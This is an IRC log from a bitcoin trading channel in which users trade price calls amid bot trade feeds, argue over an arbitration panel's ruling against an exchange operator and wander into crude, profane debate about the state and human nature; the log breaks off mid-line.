8.6953 BTC [-] Jan 21 16:10:18 BIDWALL @ 16.50 Jan 21 16:11:35 ;;ticker Jan 21 16:11:35 BTCUSD ticker | Best bid: 16.49001, Best ask: 16.49100, Bid-ask spread: 0.00099, Last trade: 16.49000, 24 hour volume: 46183.98018035, 24 hour low: 15.63412, 24 hour high: 16.70000, 24 hour vwap: 16.09854 Jan 21 16:11:47 ;;bids 16.45 Jan 21 16:11:48 There are currently 0 bitcoins demanded at or over 16.45 USD, worth 0.0 USD in total. Jan 21 16:25:58 woah, where are we heading? Jan 21 16:29:51 ;;ticker Jan 21 16:29:52 BTCUSD ticker | Best bid: 16.56000, Best ask: 16.60000, Bid-ask spread: 0.04000, Last trade: 16.60000, 24 hour volume: 46667.37538040, 24 hour low: 15.63412, 24 hour high: 16.70000, 24 hour vwap: 16.10462 Jan 21 16:31:38 Maybe 18.50 by friday? Jan 21 16:34:16 If it can break thru 17... game over man Jan 21 16:42:30 kinda scary right now Jan 21 16:42:33 ;) Jan 21 16:44:26 [MPEX] [S.DICE] 69 @ 0.0052699 = 0.3636 BTC [-] Jan 21 16:44:27 [MPEX] [S.DICE] 310 @ 0.00524149 = 1.6249 BTC [-] Jan 21 16:44:28 [MPEX] [S.DICE] 2600 @ 0.00523251 = 13.6045 BTC [-] Jan 21 16:44:29 [MPEX] [S.DICE] 221 @ 0.00521186 = 1.1518 BTC [-] Jan 21 16:47:42 [MPEX] [S.MPOE] 1435 @ 0.00060419 = 0.867 BTC [+] Jan 21 16:47:44 [MPEX] [S.MPOE] 37533 @ 0.00060893 = 22.855 BTC [+] Jan 21 17:01:18 [BTCTC] [COGNITIVE] 1 @ 0.39 BTC [-] Jan 21 17:01:20 [BTCTC] [COGNITIVE] 1 @ 0.3508 BTC [-] Jan 21 17:01:22 [BTCTC] [COGNITIVE] 10 @ 0.3501 = 3.501 BTC [-] Jan 21 17:01:24 [BTCTC] [COGNITIVE] 3 @ 0.3301 = 0.9903 BTC [-] Jan 21 17:06:35 [MPEX] [S.BVPS] 1270 @ 0.0013 = 1.651 BTC [+] Jan 21 17:15:26 [MPEX] [S.MPOE] 9850 @ 0.00060298 = 5.9394 BTC [-] Jan 21 17:15:28 [MPEX] [S.MPOE] 200 @ 0.00060142 = 0.1203 BTC [-] Jan 21 17:16:35 [MPEX] [S.MPOE] 4850 @ 0.00060142 = 2.9169 BTC [-] Jan 21 17:16:37 [MPEX] [S.MPOE] 14867 @ 0.0006 = 8.9202 BTC [-] Jan 21 17:17:29 [MPEX] [S.DICE] 2129 @ 0.00521186 = 11.096 BTC [-] Jan 21 17:17:29 [MPEX] [S.DICE] 867 @ 0.00520934 = 4.5165 BTC [-] Jan 21 17:25:03 [MPEX] [S.MPOE] 8800 @ 0.00060472 = 5.3215 BTC [+] Jan 21 17:25:04 [MPEX] [S.MPOE] 1504 @ 0.0006 = 0.9024 BTC [-] Jan 21 17:25:05 [MPEX] [S.MPOE] 3595 @ 0.00059978 = 2.1562 BTC [-] Jan 21 17:39:11 [MPEX] [S.MPOE] 1565 @ 0.00059978 = 0.9387 BTC [-] Jan 21 17:41:08 [MPEX] [S.DICE] 116 @ 0.0053 = 0.6148 BTC [+] Jan 21 17:41:10 [MPEX] [S.DICE] 93 @ 0.0053219 = 0.4949 BTC [+] Jan 21 17:41:11 [MPEX] [S.DICE] 1991 @ 0.00533151 = 10.615 BTC [+] Jan 21 17:44:24 [MPEX] [S.MPOE] 6050 @ 0.00059978 = 3.6287 BTC [-] Jan 21 17:46:12 ;;ticker Jan 21 17:46:12 BTCUSD ticker | Best bid: 16.73735, Best ask: 16.84332, Bid-ask spread: 0.10597, Last trade: 16.73533, 24 hour volume: 52756.17100206, 24 hour low: 15.63412, 24 hour high: 16.98000, 24 hour vwap: 16.18763 Jan 21 17:46:49 Wait..what? I looked just the other day and it was $15.70...now you're trying to tell me we're reaching $17? Jan 21 17:48:20 16.73 atm Jan 21 17:48:47 [BTCTC] [GOLD] 1 @ 1.05 BTC [-] Jan 21 17:51:28 [MPEX] [S.MPOE] 16188 @ 0.00060893 = 9.8574 BTC [+] Jan 21 17:51:29 [MPEX] [S.MPOE] 408 @ 0.00061096 = 0.2493 BTC [+] Jan 21 17:51:30 [MPEX] [S.MPOE] 6672 @ 0.00061217 = 4.0844 BTC [+] Jan 21 17:58:02 ;;ticker Jan 21 17:58:03 BTCUSD ticker | Best bid: 16.78819, Best ask: 16.94860, Bid-ask spread: 0.16041, Last trade: 16.94859, 24 hour volume: 53194.02273291, 24 hour low: 15.63412, 24 hour high: 16.98000, 24 hour vwap: 16.19784 Jan 21 17:58:40 I doubt we break thru 17. Asks are evaporating now Jan 21 17:58:42 err Jan 21 17:58:43 bids Jan 21 18:00:18 [MPEX] [S.MPOE] 6238 @ 0.00059978 = 3.7414 BTC [-] Jan 21 18:00:50 I didn't think we'd get this high to begin with (at least not as quickly)...so it doesn't surprise me the bids are slowing down Jan 21 18:02:08 [MPEX] [S.DICE] 1363 @ 0.00520934 = 7.1003 BTC [-] Jan 21 18:02:11 well some of the bids got impatient, and just went for the ask instead Jan 21 18:02:44 Still tons of support at 15.60 and 16.10 Jan 21 18:03:03 If t17 goes... its a free for all Jan 21 18:03:56 The MPOE market bot is undervaluing the calls right now too... 70 cent difference between vwap and current Jan 21 18:10:33 [BTCTC] [RSM] 81 @ 0.0085 = 0.6885 BTC [-] Jan 21 18:11:41 [MPEX] [S.DICE] 993 @ 0.00517224 = 5.136 BTC [-] Jan 21 18:11:46 [BTCTC] [RSM] 145 @ 0.0089 = 1.2905 BTC [+] Jan 21 18:18:35 Bugpowder: agreed Jan 21 18:18:40 walls are forming at 17 Jan 21 18:18:48 and not much to take us back to 16.50 Jan 21 18:19:13 or even 16 Jan 21 18:19:54 I think we are safely above 16.10 Jan 21 18:20:14 But my C160Ts really want us to be at 18. Jan 21 18:28:04 [MPEX] [S.MPOE] 12550 @ 0.00059978 = 7.5272 BTC [-] Jan 21 18:29:40 but why s.mpoe shareholders had to chose this time to cash out Jan 21 18:32:31 [MPEX] [S.DICE] 244 @ 0.00517224 = 1.262 BTC [-] Jan 21 18:32:54 cause MPOE is gonna have a bad week if the price keeps going up (I guess) Jan 21 18:33:11 looks like it will not stop any time soon Jan 21 18:33:37 the bulls want to break every piece of china in the shop. Jan 21 18:41:01 ha, seems so Jan 21 18:41:50 [BTCTC] [BTC-TRADING-PT] 10 @ 0.1432 = 1.432 BTC [-] Jan 21 18:42:13 if it goes only up, it won't be such a bit problem, maybe bonds pay only a half of MPBOR Jan 21 18:43:06 so whats new Jan 21 18:43:08 but if it decides to swing to, say, 13, now that would be a problem Jan 21 18:44:01 mircea, bitcoinica is shipping Jan 21 18:44:11 ..er...mixed that up :/ Jan 21 18:44:46 lmao Jan 21 18:44:49 shipping what ? Jan 21 18:45:22 ;;ticker Jan 21 18:45:23 BTCUSD ticker | Best bid: 16.75000, Best ask: 16.77669, Bid-ask spread: 0.02669, Last trade: 16.75000, 24 hour volume: 54418.34696679, 24 hour low: 15.63412, 24 hour high: 16.98000, 24 hour vwap: 16.21918 Jan 21 18:45:48 whoa nelly Jan 21 18:47:58 avalon Jan 21 18:48:19 2 units shipped over the weekend: one to jgarzik, one to bitcoin foundation Jan 21 18:48:20 o, they really shipped ? linx ? Jan 21 18:48:27 i assume 300 more to random miners Jan 21 18:48:28 yaya , but did either confirm ? Jan 21 18:48:37 not yet to my knowlege Jan 21 18:48:49 well that'sd where it was friday :p Jan 21 18:48:58 btw, you people about ready to enter your ruling ? Jan 21 18:49:11 pigeons Jan 21 18:49:27 rassah Jan 21 18:49:45 i think i deserve the 140BTC or so Jan 21 18:49:49 i've been thinking on it Jan 21 18:49:54 lol Jan 21 18:50:13 i only need to convince one other judge of the same Jan 21 18:50:15 https://bitcointalk.org/index.php?topic=100909.msg1467772#msg1467772 Jan 21 18:50:20 his meds are not work :( Jan 21 18:53:53 [BTCTC] [COGNITIVE] 3 @ 0.4 = 1.2 BTC [+] Jan 21 18:54:10 http://trilema.com/2013/case-i-wences-vs-mpex-breach-of-fiduciary-duty/ Jan 21 18:54:26 R Company Sales/mth $ Profit/yr BTC Profit/yr Industry link Jan 21 18:54:26 1 MtGox $ 14M $ 3.2M 200k Exchange - Jan 21 18:54:35 dude srsly ?! mtgox clears 200k btc a year ? Jan 21 18:54:39 EskimoBob go fuck yourself that was a joke Jan 21 18:54:53 [MPEX] [S.MPOE] 6450 @ 0.00060007 = 3.8705 BTC [+] Jan 21 18:55:11 mircea_popescu in the last post it looks like the signature line is cut off: Jan 21 18:55:25 [BTCTC] [BTC-TRADING-PT] 10 @ 0.1432 = 1.432 BTC [-] Jan 21 18:55:32 line starts like: HBNlxhUDnEKbMl1p082ergE+ekRZINRmr12/DpZQy0sODhxGTE40HukSnPL+mQDDy8yg+bjQb Jan 21 18:55:35 but that's all i get Jan 21 18:55:42 Signature: HBNlxhUDnEKbMl1p082ergE+ekRZINRmr12/DpZQy0sODhxGTE40HukSnPL+mQDDy8yg+bjQblA+NsJeI3XyoEs= Jan 21 18:55:44 is what i see Jan 21 18:55:50 I believe I need to verify that. thanks Jan 21 18:57:31 [MPEX] [S.MPOE] 17867 @ 0.00060823 = 10.8672 BTC [+] Jan 21 18:59:07 [MPEX] [S.MPOE] 2700 @ 0.00060823 = 1.6422 BTC [+] Jan 21 19:00:03 [MPEX] [S.MPOE] 4300 @ 0.00060823 = 2.6154 BTC [+] Jan 21 19:04:42 [MPEX] [S.MPOE] 1950 @ 0.00060558 = 1.1809 BTC [-] Jan 21 19:04:44 [MPEX] [S.MPOE] 22552 @ 0.00059978 = 13.5262 BTC [-] Jan 21 19:04:45 [MPEX] [S.MPOE] 3498 @ 0.00059924 = 2.0961 BTC [-] Jan 21 19:19:06 [MPEX] [O.BTCUSD.P160T] 777 @ 0.04160326 = 32.3257 BTC [-] Jan 21 19:21:51 [MPEX] [S.MPOE] 14500 @ 0.00059924 = 8.689 BTC [-] Jan 21 19:27:18 EskimoBob: i nominated jcpham because he would be less likely to be viewed as a sock puppet than kako who is a business partner of mp and i know smickles has done deals with him too Jan 21 19:27:28 [MPEX] [S.MPOE] 6152 @ 0.00059924 = 3.6865 BTC [-] Jan 21 19:27:30 [MPEX] [S.MPOE] 27628 @ 0.00059908 = 16.5514 BTC [-] Jan 21 19:27:31 [MPEX] [S.MPOE] 18900 @ 0.00059845 = 11.3107 BTC [-] Jan 21 19:27:33 [MPEX] [S.MPOE] 10670 @ 0.0005984 = 6.3849 BTC [-] Jan 21 19:27:46 EskimoBob: and jcpham is talking about convincing one other judge to rule against MP, which doesnt seem to need any convincing anytwasy Jan 21 19:28:03 omgwhat conspiraci si this ?! Jan 21 19:28:18 [BTCTC] [GSDPT] 10 @ 0.0055 = 0.055 BTC [-] Jan 21 19:29:47 [BTCTC] [BTC-TRADING-PT] 1 @ 0.1432 BTC [-] Jan 21 19:31:12 mircea_popescu the rota has decided to rip you off Jan 21 19:31:22 i hope you are happy :) Jan 21 19:31:26 I estimate Mtgox only makes 100,000 BTC /year Jan 21 19:31:26 i call shenanigans Jan 21 19:31:33 lol Jan 21 19:31:35 Bugpowder iirc they made a loss in 2010 Jan 21 19:31:40 [MPEX] [S.DICE] 756 @ 0.0052 = 3.9312 BTC [+] Jan 21 19:31:42 [MPEX] [S.DICE] 244 @ 0.00516178 = 1.2595 BTC [-] Jan 21 19:31:43 that was a long time ago Jan 21 19:31:45 and their 2011 report showed a modest recovery Jan 21 19:31:51 but still overal in the hole. Jan 21 19:31:57 1M coins a month Jan 21 19:32:00 traded Jan 21 19:32:18 0.6-1.2% fee Jan 21 19:32:23 per trade Jan 21 19:32:35 so 100k bitcoins in revenue Jan 21 19:32:42 Bugpowder i just go by the reports they publish Jan 21 19:32:46 you saw those ? Jan 21 19:32:54 nop Jan 21 19:32:59 lemme dig up Jan 21 19:35:13 [MPEX] [S.MPOE] 11900 @ 0.0005984 = 7.121 BTC [-] Jan 21 19:37:18 [MPEX] [S.MPOE] 122 @ 0.00060823 = 0.0742 BTC [+] Jan 21 19:37:20 [MPEX] [S.MPOE] 8667 @ 0.00061217 = 5.3057 BTC [+] Jan 21 19:37:21 [MPEX] [S.MPOE] 3388 @ 0.00061302 = 2.0769 BTC [+] Jan 21 19:37:47 Bugpowder https://mtgox.com/img/pdf/20120201/Transparency_Jan.pdf 2011 one Jan 21 19:38:19 mircea_popescu does payment for the rota come from the fees paid by the claimant and defendant (you) Jan 21 19:38:24 or was this the intention or not Jan 21 19:38:53 we are unsure if we should we should pay ourselves from the fees Jan 21 19:39:00 jcpham each party pays 10 btc, for a total of 20. Jan 21 19:39:04 which might seem greedy but i'll ask it Jan 21 19:39:13 the prevailing party gets up to 10 btc back (depending what % of their claim is granted) Jan 21 19:39:21 are we to judge our own dsalary is my question Jan 21 19:39:22 the losing party gets nothing. the judges get 3 btc each. Jan 21 19:39:23 How much of their $50,000 / month operating costs is salaries to the owner Jan 21 19:39:26 ? Jan 21 19:39:31 nah, the judges get the salary no matter what. Jan 21 19:39:31 i see Jan 21 19:39:38 ok understood Jan 21 19:39:40 Bugpowder nothing afaik. Jan 21 19:40:25 They say their server costs are $5,000 / mo Jan 21 19:40:32 where is the other $45k / mo going? Jan 21 19:40:48 Bugpowder they have something like 5 employees Jan 21 19:40:54 in japan this costs a little bit of money Jan 21 19:40:57 they have a 3 room office Jan 21 19:41:07 yeah Jan 21 19:41:09 salaries Jan 21 19:41:12 in a not so great part of town, but anyway Jan 21 19:41:19 japan is expensive throughout Jan 21 19:41:25 Also its 50k btc + $350k Jan 21 19:41:41 revenue Jan 21 19:41:47 they also took angel funding in 2010ish Jan 21 19:42:04 yeah but that is equity Jan 21 19:42:20 They pay out the revenue to employee salary most likely Jan 21 19:42:29 CEO makes 100-150k Jan 21 19:42:31 $ Jan 21 19:42:34 guessing Jan 21 19:42:41 you know how cosanguine these things get Jan 21 19:42:45 angel gets employed etc Jan 21 19:42:56 Angel should not have more than 20% equity Jan 21 19:43:31 we don't know the terms of course Jan 21 19:43:40 they were never released, no. Jan 21 19:43:59 are you up to speed with their op history atall ? Jan 21 19:44:40 I started paying attention to btc when it hit $7 the first time Jan 21 19:44:55 I know about the hack and crash Jan 21 19:45:02 but not much else Jan 21 19:45:13 Only had a gox account for about a year Jan 21 19:46:23 maybe 18 months Jan 21 19:46:25 i don't remember Jan 21 19:47:03 1 year Jan 21 19:50:45 well anyway, originalyl site started by some guy in the us Jan 21 19:50:51 who then got cold feet and wanted out Jan 21 19:50:56 yeah Jan 21 19:50:59 gave the site away practically to the current team Jan 21 19:51:06 then hacked into it and stole some moneyz lol Jan 21 19:51:12 oops Jan 21 19:51:16 (that was the "auditor" ) Jan 21 19:51:54 den of thieves, bitcoin is. Jan 21 19:52:51 [BTCTC] [RSM] 98 @ 0.0089 = 0.8722 BTC [+] Jan 21 19:53:35 [MPEX] [S.MPOE] 6265 @ 0.00060205 = 3.7718 BTC [-] Jan 21 19:54:01 kinda primitive relationships, at least historically. Jan 21 19:54:45 [BTCTC] [RSM] 14 @ 0.009 = 0.126 BTC [+] Jan 21 19:59:36 [MPEX] [S.MPOE] 5685 @ 0.0005984 = 3.4019 BTC [-] Jan 21 19:59:38 mircea_popescu, primitive as opposed to what ? Jan 21 20:00:10 to the wannabe Rule Of Law irl? Jan 21 20:00:23 jurov_ relationships based on tribal structures rather than flow of capital, law and ownership Jan 21 20:03:50 and how would that happen? as long as majority of players are anonymous, there is no real incentive to follow the law Jan 21 20:03:52 [MPEX] [S.MPOE] 22500 @ 0.0005984 = 13.464 BTC [-] Jan 21 20:04:15 BURNING MAN Jan 21 20:04:53 i tried to reconcile that when i thought about the gpg story, but no. people just are dishonorable thieves when they can. Jan 21 20:06:15 eh, i doubt that. Jan 21 20:06:25 for most of history people could be dishonorable thieves and mostly were not. Jan 21 20:06:40 i think this is a convenient statal lie, to justify the historically incredible levels of taxation. Jan 21 20:06:57 [MPEX] [S.MPOE] 1017 @ 0.00060205 = 0.6123 BTC [+] Jan 21 20:07:00 [MPEX] [S.MPOE] 8217 @ 0.00060947 = 5.008 BTC [+] Jan 21 20:07:45 then why the first reaction to state failure is often looting? Jan 21 20:08:48 don't know if it's true but i heard in romania even central heating equipment was stolen in some places Jan 21 20:08:56 when communist regime fell Jan 21 20:08:59 for the same reason takling away the prop of a tree leads to tree colapsing Jan 21 20:09:06 this doesn't prove trees can't grow on their own trunks Jan 21 20:09:12 it just proves propping them is a bad idea. Jan 21 20:12:40 i don't see how the argument relates.. it was not like something completely vital was removed during the '89 revolution Jan 21 20:13:40 [MPEX] [S.DICE] 600 @ 0.00533727 = 3.2024 BTC [+] Jan 21 20:13:53 something completely vital was removed for the red decades Jan 21 20:14:05 replaced with a stupid barely functional ersatz Jan 21 20:14:15 once the ersatz collapsed the impression was that there's something missing. Jan 21 20:17:17 [MPEX] [S.MPOE] 7667 @ 0.00060947 = 4.6728 BTC [+] Jan 21 20:22:50 lol, show me any significant group of people that can exist outside of state without "impression that there's something missing" Jan 21 20:23:37 ever been in a mining colony ? Jan 21 20:24:02 [BTCTC] [BASIC-MINING] 4 @ 0.34 = 1.36 BTC [+] Jan 21 20:24:03 no, why? Jan 21 20:24:46 well cause it'd be a ready example. Jan 21 20:24:49 any small village works, too. Jan 21 20:25:50 yes, provided there are no armed groups roaming the landscape Jan 21 20:26:10 last 60 years in europe are an exception in this regard Jan 21 20:26:27 how about the old west ? Jan 21 20:26:47 what is old west? Jan 21 20:28:00 you mean in america? Jan 21 20:28:33 yea Jan 21 20:30:01 [MPEX] [S.MPOE] 2150 @ 0.0005984 = 1.2866 BTC [-] Jan 21 20:33:17 good example. it mostly appeared to work cause there was no competition for food/land... Jan 21 20:33:30 but maybe at expense to slaves/natives Jan 21 20:34:12 i don't know 'merica history, dunno how many people were actually violently killed there Jan 21 20:34:25 millions Jan 21 20:34:28 just got the feeling that ability to call 911 was welcomed even there Jan 21 20:34:42 [MPEX] [S.MPOE] 6000 @ 0.00059841 = 3.5905 BTC [+] Jan 21 20:34:44 [MPEX] [S.MPOE] 15650 @ 0.0005984 = 9.365 BTC [-] Jan 21 20:36:14 911 is a joke in you town Jan 21 20:37:53 no competition for food/land ?! Jan 21 20:37:57 my very dear boy! Jan 21 20:38:04 the us was built on competition for food and land. Jan 21 20:38:09 [HAVELOCK] [SDICE] 1 @ 0.53 BTC [-] Jan 21 20:38:16 what do you think made barbed wire such a commercial success Jan 21 20:38:51 barbed wire? used in american old west? you lost me again Jan 21 20:40:08 missed the start of this conversation Jan 21 20:40:25 but the problem with humans is we are naturally peices of shit Jan 21 20:40:43 i'd say yurp built on competition for food and land... when it got unbearable, everyone went to us since it was supposedly much better there Jan 21 20:40:49 once you put enough of us in close proximity we will rob rape and kill each other Jan 21 20:41:05 especially if food is in short supply Jan 21 20:41:06 which means you need some policing which implies a state Jan 21 20:41:13 even when its not Jan 21 20:41:46 if you force me to live in close proximity with people Jan 21 20:42:07 i would probably attempt to dominate my peers or control them Jan 21 20:42:44 C cup and larger against that wall Jan 21 20:42:52 strong men over here against this wall Jan 21 20:42:58 well, _you_ would because of your conditioning, that success must be at teh expense of your peers Jan 21 20:43:14 yes i am a shit Jan 21 20:43:17 i admit it Jan 21 20:43:33 everyone would be a resource for me to assign Jan 21 20:43:41 even without our existing societal fuck up, humans cannot coexist en masse Jan 21 20:44:59 [BTCTC] [COGNITIVE] 1 @ 0.3999 BTC [-] Jan 21 20:45:02 jcpham the dispute of cattle vs farm was settled by barbed wire Jan 21 20:45:10 more efficient than the other party's weaponry. Jan 21 20:45:15 [BTCTC] [COGNITIVE] 4 @ 0.4 = 1.6 BTC [+] Jan 21 20:45:31 the 'ol fence trick, eh? Jan 21 20:45:43 round 'em up and stick them in a fence? Jan 21 20:47:05 [BTCTC] [BASIC-MINING] 2 @ 0.34 = 0.68 BTC [+] Jan 21 20:47:06 anyway, i think when i'd pick random person that lived 60 to 6000 years ago and explained about how oppressive is the modern state i currently live in Jan 21 20:47:24 i'd get unbelieving stare, perhaps Jan 21 20:49:22 not that it can't be improved... but removing it completely, srsly? Jan 21 20:49:44 sure. Jan 21 20:50:18 removing a lot of these societal structures implies a lot of death Jan 21 20:50:31 well, at least whining Jan 21 20:50:41 not whining! Jan 21 20:50:58 listen, killing someione is not the trivial matter it appears to be in video games. Jan 21 20:51:10 even if given free reign to kill anyone at any time most people couldn't be arsed. Jan 21 20:51:11 lol, maybe he'd agree that inability to treat wives as property is kinda oppressing :DDD Jan 21 20:51:25 [MPEX] [O.BTCUSD.C140T] 5 @ 0.15725077 = 0.7863 BTC [+] Jan 21 20:51:48 i mean death as in people who cannot provide for themselves Jan 21 20:51:53 without society and technology Jan 21 20:52:09 and who will surely waste away or be overtaken by others Jan 21 20:52:19 or learn to suck cock, and do it well. Jan 21 20:52:25 yikes Jan 21 20:52:29 true story though Jan 21 20:52:42 there's nothing wrong with giving good head. Jan 21 20:52:46 well, or else people who want to help "people who cannot provide for themselves" won't have GovCo in the way and can help them Jan 21 20:53:00 if we all were required to produce something to be usefull, many of us might be in trouble Jan 21 20:53:19 assume you have an alotment of fresh air Jan 21 20:53:33 that costs some personal production Jan 21 20:53:44 you want to breathe, contribute. Jan 21 20:54:10 i'm telling you fresh water futures and clean air Jan 21 20:54:18 someone will mop up one day Jan 21 20:54:38 first we need to get rid of that meddling lorax Jan 21 20:54:48 jcpham i doubt mpoe-pr would have much trouble. Jan 21 20:54:58 jcpham, funnily enough that was a communist idea that everyone must be employed and producing Jan 21 20:55:17 i somewhat agree with it Jan 21 20:55:36 the hilarious thing about libertarians and anti-state crowd Jan 21 20:55:37 the worls is full of producers and consumers Jan 21 20:55:49 consumers far far far outweigh producers Jan 21 20:56:34 is the root of it is they think that because they are a beautiful and unique snowflake they will somehow do a better job than 'the state' Jan 21 20:57:08 dub indeed :D Jan 21 20:57:10 when its that inherently selfish nature of humanity that is the reason we need it Jan 21 20:57:17 after all, they're smart enough to have figured it out first! Jan 21 20:57:47 i agree that i am an entirely selfish human Jan 21 20:57:55 much more so now that i have a fmily Jan 21 20:57:59 you are human Jan 21 20:58:14 its a human trait, you don't own it you selfish bastard Jan 21 20:58:25 :) Jan 21 20:58:28 fuck you dub its all mine Jan 21 20:58:34 i am the only one Jan 21 20:58:38 you both are lying Jan 21 20:58:45 I AM THE ONLY SELFISH ONE< YOU WILL DIE NOW Jan 21 20:59:03 brb loading my ar15 Jan 21 20:59:07 how can we bet on this now? Jan 21 20:59:17 can we make a selfishness bet Jan 21 20:59:25 no you can't Jan 21 20:59:27 because i made it Jan 21 20:59:32 damn Jan 21 20:59:42 I have a good one, by 2050 there will be less than half as many humans as today Jan 21 20:59:54 that wil prove it nicely Jan 21 21:00:45 and if we are around to collect, well we already won so we wont need to Jan 21 21:01:50 i will personally impregnate a billionty womenz to win this bet. Jan 21 21:01:53 me and micon Jan 21 21:02:38 dub: ever heard of the prisoner's dilemma? Jan 21 21:03:12 in a non-zero sum game, the "selfish" move also helps everyone else Jan 21 21:03:31 isthat nonzero or above zero ? Jan 21 21:03:59 omfg what bs ruling is this. Jan 21 21:04:38 [MPEX] [S.DICE] 1750 @ 0.0053558 = 9.3727 BTC [+] Jan 21 21:04:55 http://en.wikipedia.org/wiki/Prisoner's_dilemma Jan 21 21:05:00 ahhh philosophy 101 Jan 21 21:05:11 ethics even Jan 21 21:05:13 it means that hurting your opponent doesn't help you.. that's non-zero sum Jan 21 21:05:23 jcpham pigeons i hope you realise the net result of this will simply be me putting it in the faq that i will keep all misrouted funds and fu. Jan 21 21:05:44 games like chess or checkers, are zero sum, where hurting your opponent directly helps you Jan 21 21:05:47 pigeons you see that Jan 21 21:06:03 it's not above zero, below zero, or zero Jan 21 21:06:40 [MPEX] [S.DICE] 2075 @ 0.0053558 = 11.1133 BTC [+] Jan 21 21:06:52 mircea_popescu is our judgement not "fair" Jan 21 21:07:08 it's particularly dumb, in that it allows idiots to extract money from me now. Jan 21 21:07:15 send 100 btc, sue, get 110 back lalala Jan 21 21:07:35 so no, this is the last case on this topic. Jan 21 21:07:48 so 20 btc in "fees" Jan 21 21:07:55 9 to judges leaving 11 Jan 21 21:08:08 fair is to split the 11btc Jan 21 21:08:15 or not pay the rota? Jan 21 21:08:23 it is confusing Jan 21 21:08:34 myeah. Jan 21 21:08:39 [BTCTC] [MININGCO.ETF] 2 @ 0.5 = 1 BTC Jan 21 21:09:53 now you can just tell everyone the orta sucks Jan 21 21:09:59 we are all just scamsters Jan 21 21:10:04 pretty mcuh lol. "too soon" Jan 21 21:10:46 i'd also be willing to forego payment to make the situation "correct" Jan 21 21:10:54 didn't seem like an avaialble option though Jan 21 21:11:14 forego payment, what bs is that. Jan 21 21:11:29 you don't forego payment. fucking up has costs. Jan 21 21:11:37 you just allocated the cost of fucking up to me, and i'm not the one who fucked up. Jan 21 21:11:39 that's just me i'm speaking for Jan 21 21:11:40 this is fucked up. Jan 21 21:12:27 if you send me a bill for your losses i can make payments until you recover fully Jan 21 21:12:44 wat Jan 21 21:12:49 lol Jan 21 21:13:14 this is the dumbest ruling in virtual case law Jan 21 21:13:27 lol Jan 21 21:13:32 also the first. Jan 21 21:13:35 funny how that works 0.0 Jan 21 21:13:42 ikr Jan 21 21:13:45 i guess it at least proves they be independent ninnies. Jan 21 21:14:09 i think mre preparation or organization is required Jan 21 21:14:24 you guys need to think about what you're doing Jan 21 21:14:29 dawg, independence is this concept whereby people think autonomously Jan 21 21:14:31 christ on a pony Jan 21 21:15:07 [MPEX] [S.DICE] 500 @ 0.00534198 = 2.671 BTC [-] Jan 21 21:15:09 [MPEX] [S.DICE] 850 @ 0.00534197 = 4.5407 BTC [-] Jan 21 21:15:10 [MPEX] [S.DICE] 1446 @ 0.00524041 = 7.5776 BTC [-] Jan 21 21:15:23 i suppose it is too late now Jan 21 21:18:01 [MPEX] [S.MPOE] 9684 @ 0.00060947 = 5.9021 BTC [+] Jan 21 21:18:03 [MPEX] [S.MPOE] 11366 @ 0.00060971 = 6.93 BTC [+] Jan 21 21:18:04 it wouldn't be drama if it weren't too late. Jan 21 21:19:39 whatever. i was organizing international summercamp, bank asked us the fee to sort out payments with incomplete info Jan 21 21:19:41 not them Jan 21 21:19:58 i doubt if i'd get anything if we sued Jan 21 21:20:14 right. cause the bank won't do the insane sort of shit i do Jan 21 21:20:17 cause it knows better Jan 21 21:21:53 what a bunch of asshats Jan 21 21:24:01 fwiw i started to penalize you both equally Jan 21 21:24:09 because why ? Jan 21 21:24:11 for making me work Jan 21 21:24:16 lol Jan 21 21:24:24 omfg why did you ask to do this?!?!?! Jan 21 21:24:55 jesus told me to apply Jan 21 21:25:01 of course he did Jan 21 21:25:07 lol Jan 21 21:25:20 why are you upset mod6 Jan 21 21:25:33 ima hold rota entrance exams, consisting of reciting cicero and laurian in latin Jan 21 21:25:41 mircea_popescu will keep the funds in the future Jan 21 21:25:48 so he won't even need the rota Jan 21 21:26:11 seems like a win-win for a few btc Jan 21 21:26:18 ya, but i'll send all complainants to haunt you Jan 21 21:26:30 we figured that... Jan 21 21:26:37 sortof an early precednet Jan 21 21:27:26 hopefully I won'r be nominated anymore because i'm just insane Jan 21 21:27:31 [MPEX] [S.MPOE] 10284 @ 0.00060971 = 6.2703 BTC [+] Jan 21 21:27:33 [MPEX] [S.MPOE] 4766 @ 0.00061235 = 2.9185 BTC [+] Jan 21 21:29:51 bah, "judges" nobody asked about the "mispaid/rounded orders create significant overhead"? Jan 21 21:30:27 no cause they are from occupy movement. Jan 21 21:30:29 like, is it so significant as to justfy keeping whole amount? Jan 21 21:31:10 occupy? now it's clear to me. Jan 21 21:32:08 occupy movement..... huh Jan 21 21:33:45 you know, the people who hate financial instutions Jan 21 21:34:43 jcpham, do ask, i'm curious. maybe the overhead includes doing something interesting with the bitches Jan 21 21:34:53 lol Jan 21 21:35:39 [MPEX] [S.MPOE] 7785 @ 0.00060287 = 4.6933 BTC [-] Jan 21 21:36:03 (11:25) < mircea_popescu> ima hold rota entrance exams, consisting of reciting cicero and laurian in latin Jan 21 21:36:06 this is a must Jan 21 21:36:22 otherwise this just creates way more problems then it solves Jan 21 21:36:36 we can't have these dunderhead rulings being created when people have no idea what they're even doing Jan 21 21:37:02 otherwise this just creates way more problems then it solves << i am grasped by sudden terror at the realisation of that, yes. Jan 21 21:37:12 somehow i just never foresaw this one. Jan 21 21:37:16 rip it up and start again Jan 21 21:37:51 im not doing anything today. Jan 21 21:38:14 im srsly irk'd by this Jan 21 21:38:19 why lol Jan 21 21:39:37 the plaintiff fucked up. his funds should be returned minus fees. nothing more. Jan 21 21:39:42 who initiated the rota action? Jan 21 21:39:43 nothing less. this is idiotic. Jan 21 21:39:49 oh the plaintiff Jan 21 21:39:50 yeah i wanted punititve damages against mircea_popescu for wasting our time, using the rota as a promotion, and forcing customers to sue him just to get typical service Jan 21 21:39:53 is the fuckup guy Jan 21 21:39:57 [MPEX] [S.MPOE] 934 @ 0.00061235 = 0.5719 BTC [+] Jan 21 21:39:59 [MPEX] [S.MPOE] 16495 @ 0.00061302 = 10.1118 BTC [+] Jan 21 21:40:12 pigeons yeah well, you sorta misunderstand what this is all for. Jan 21 21:40:34 possibly Jan 21 21:40:59 i really thought the court was a great idea, actually. now i just see that we don't have the foresight/legal wisdom to carry it out Jan 21 21:41:15 like the real judged do. Jan 21 21:41:21 judges Jan 21 21:41:30 this is more important then that is Jan 21 21:41:43 that still will be over in the not too distant future, this is the future Jan 21 21:41:50 what good is talking going to do now Jan 21 21:41:56 if i'm not allowed to change anything Jan 21 21:42:11 i mean, I don't like the format myself Jan 21 21:42:14 jcpham cause you get to feel bad about it Jan 21 21:42:19 the blog posting and whatnjot Jan 21 21:42:29 sorry why was the rota engaged? Jan 